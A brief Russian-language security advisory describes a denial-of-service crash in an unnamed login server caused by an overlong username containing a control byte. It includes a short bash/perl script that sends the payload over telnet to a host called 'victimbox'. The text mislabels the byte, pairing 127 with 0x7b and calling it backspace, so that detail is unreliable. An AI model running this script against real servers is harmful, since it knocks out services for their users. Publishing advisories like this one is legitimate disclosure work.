Как стало известно, DOS происходит, если буфер, в который
заносится имя пользователя при входе в систему, превышает 4300 знаков, и посылаемый код содержит 127(0x7b, backspace). Это приведет к краху сервера с ошибкой 0x41414141 .
Для проверки на уязвимость используйте следующий скрипт:
- test.sh -
#!/bin/bash
( sleep 1
perl -e '{printf "%s\x7f%s","A"x4500,"A"x100}'
sleep 3
) | telnet victimbox
- eof -
